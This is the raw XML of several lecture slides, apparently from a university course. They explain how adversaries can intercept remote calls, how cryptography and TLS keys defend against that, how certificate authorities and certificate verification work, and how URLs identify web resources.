          <p:cNvPr id="384" name="Shape 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9419238" y="6176240"/>
            <a:ext cx="5545524" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Shape 385"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10924539" y="6405562"/>
            <a:ext cx="253492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i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>&lt;result&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Shape 386"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2481469" y="8365545"/>
            <a:ext cx="19421062" cy="4103041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="611187" indent="-611187" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="4950"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Calls</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> to remote services could be </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>intercepted</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> by an adversary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1002347" lvl="1" indent="-562292" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Snoop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> on inputs/outputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1002347" lvl="1" indent="-562292" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Corrupt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> inputs/outputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="611187" indent="-611187" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="4950"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Avoid this possibility using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>cryptography</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="387" name="pasted-image.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10655324" y="1611651"/>
            <a:ext cx="3073353" cy="333422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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166509440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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="381"/>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38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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="384"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="384"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38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fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="386"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="386"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetID="23" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="387"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="387"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animBg="1" advAuto="0"/>
      <p:bldP spid="382" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="383" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="384" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="385" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="386" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="387"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16B6-45B6-2478-EEAF-32080F418E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aside: Crypto is amazing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97CA6817-2899-79D8-E397-11982CAD45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B6880B-4862-C490-B3D4-C458B0335CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1190319195"/>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EE03-E68A-05F4-2A56-7292EE0C7B0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="3934533"/>
            <a:ext cx="5257800" cy="5094514"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="7200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>How are keys used with TLS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B17984EC-AD95-0A52-1D0B-FA867F0C164C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9554632" y="1753194"/>
            <a:ext cx="13561400" cy="10204952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="502471168"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">
    <p:pull dir="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C2C-2A7B-7F85-0A6A-11FA6FFCF19A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verifying certificates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B475DE65-99AF-AFBF-E9C1-446CCFA1798A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3929556" y="3261229"/>
            <a:ext cx="16524888" cy="9724522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB1728C-4978-1C3F-2356-EFA7E45BCF63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="8528668"/>
            <a:ext cx="7189076" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5600" dirty="0"/>
              <a:t>Certificates like these issued by Certificate Authorities (CAs)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="855639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3B02349-6097-A465-5A71-105AA6A36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05451-C94B-6AF4-EA25-D3C22FC36854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verifying certificates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BD8DCBE-EAB6-F0CD-8C28-88D18442ADEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961773" y="3381377"/>
            <a:ext cx="8345754" cy="4911286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE413067-77AE-20D8-A598-8A5F32C38839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9551538" y="3021945"/>
            <a:ext cx="13912052" cy="9963806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD16CC2E-A48F-6CE5-B294-3F5715EFA7E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1676401" y="8949628"/>
            <a:ext cx="7875138" cy="2677656"/>
            <a:chOff x="838200" y="4474814"/>
            <a:chExt cx="3937569" cy="1338828"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D73EEC8C-E89A-1A39-7DCF-2F269A2A5711}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="4474814"/>
              <a:ext cx="2435534" cy="1338828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="5600" dirty="0"/>
                <a:t>Certificate authorities included here </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="5" name="Straight Arrow Connector 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB0E39F0-D73C-2760-FF3E-349B8231C698}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3112376" y="5407572"/>
              <a:ext cx="1663393" cy="1758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9051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8099D1-9A03-96FD-6CA3-C74311165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BB879-A8CB-8E70-5CBF-24E42832EC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verifying certificates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF002F68-1F97-E881-66A0-0540F19A4AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961773" y="3381377"/>
            <a:ext cx="8345754" cy="4911286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0CC6AA-E5DD-A18F-883B-1338FA4C57A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11056883" y="3085007"/>
            <a:ext cx="8345754" cy="5977226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{099C7B2F-3BB9-B62C-A4A8-5E70047D2E42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4981365" y="3085006"/>
            <a:ext cx="15181370" cy="9369752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7449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 name="Interacting with web servers"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4780595" y="519534"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="502412">
              <a:defRPr sz="9632"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Interacting with web servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="http://www.cs.umd.edu/~mwh/index.html"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5012763" y="4259812"/>
            <a:ext cx="1425487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u="sng">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.cs.umd.edu/~mwh/index.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Resources which are identified by a URL…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5886065" y="2496523"/>
            <a:ext cx="12611870" cy="1450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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1"/>
              <a:t>Resources</a:t>
            </a:r>
            <a:r>
              <a:t> which are identified by a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>(Universal Resource Locator)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="151" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4437584" y="4273929"/>
            <a:ext cx="2730922" cy="2326621"/>
            <a:chOff x="-91816" y="-1619306"/>
            <a:chExt cx="2730921" cy="2326620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="392144" y="-1619307"/>
              <a:ext cx="1763001" cy="1000020"/>
